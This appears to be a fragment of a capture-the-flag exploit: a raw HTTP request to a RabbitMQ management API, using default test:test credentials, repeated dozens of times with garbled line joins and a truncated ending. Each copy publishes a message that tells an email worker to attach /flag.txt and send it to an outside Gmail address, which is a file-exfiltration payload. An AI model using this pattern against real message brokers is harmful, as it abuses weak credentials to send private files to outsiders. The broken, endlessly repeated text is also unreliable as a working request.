-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
